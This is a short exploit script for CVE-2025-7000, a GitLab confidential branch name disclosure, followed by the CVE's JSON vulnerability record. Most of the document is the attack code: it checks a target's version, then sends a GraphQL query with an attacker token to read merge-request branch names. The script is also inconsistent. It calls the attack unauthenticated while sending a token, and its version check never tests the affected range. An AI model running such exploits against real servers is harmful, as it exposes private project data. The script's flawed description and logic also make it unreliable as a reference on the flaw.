CVE-2025-7000

import requests # CVE-2025-7000 PoC - GitLab Information Disclosure # Description: Unauthenticated users can view confidential branch names via project issues GITLAB_URL = "https://gitlab.example.com" PROJECT_ID = "<target_project_id>" ISSUE_IID = "<target_issue_iid>" USERNAME = "<attacker_username>" TOKEN = "<attacker_token>" def check_gitlab_version(): """Check if target GitLab version is vulnerable""" response = requests.get(f"{GITLAB_URL}/api/v4/version") if response.status_code == 200: version = response.json().get('version', '') # Check if version is in vulnerable range print(f"[*] GitLab Version: {version}") return True return False def get_issue_with_mr(): """Get issue details and extract branch names from related merge requests""" headers = { 'PRIVATE-TOKEN': TOKEN, 'Content-Type': 'application/json' } # GraphQL query to fetch issue with related MRs graphql_query = { "query": f""" {{ project(fullPath: "{PROJECT_ID}") {{ issue(iid: "{ISSUE_IID}") {{ title description mergeRequests {{ nodes {{ title sourceBranch targetBranch webUrl }} }} }} }} }} """ } response = requests.post( f"{GITLAB_URL}/api/graphql", json=graphql_query, headers=headers ) if response.status_code == 200: data = response.json() if 'data' in data and 'project' in data['data']: issue = data['data']['project']['issue'] if issue and 'mergeRequests' in issue: for mr in issue['mergeRequests']['nodes']: print(f"[!] Disclosed Branch Name: {mr['sourceBranch']}") print(f"[*] MR Title: {mr['title']}") print(f"[*] MR URL: {mr['webUrl']}") return True print("[-] No confidential branch information disclosed or access denied") return False if __name__ == "__main__": print("[*] CVE-2025-7000 PoC - GitLab Confidential Branch Name Disclosure") print("[*] Target: " + GITLAB_URL) if check_gitlab_version(): print("[*] Attempting to extract confidential branch names...") get_issue_with_mr() else: print("[-] Failed to verify GitLab version")

{"cve": {"id": "CVE-2025-7000", "sourceIdentifier": "[email protected]", "published": "2025-11-15T08:15:46.487", "lastModified": "2025-11-20T21:03:40.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue has been discovered in GitLab CE/EE affecting all versions from 17.6 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2, that, under specific conditions, could have allowed unauthorized users to view confidential branch names by accessing project issues with related merge requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "17.6.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "4398F785-F443-44A2-9191-768F48B10579"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.6.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "1272563C-FE27-48BE-9666-065197613AE2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "36824F52-C9A0-4FB3-91F3-05593E3551E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "7E85D20B-EEE1-4CC9-B50A-4040972287D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/553129", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3214025", "source": "[email protected]", "tags": ["Permissions Required"]}]}}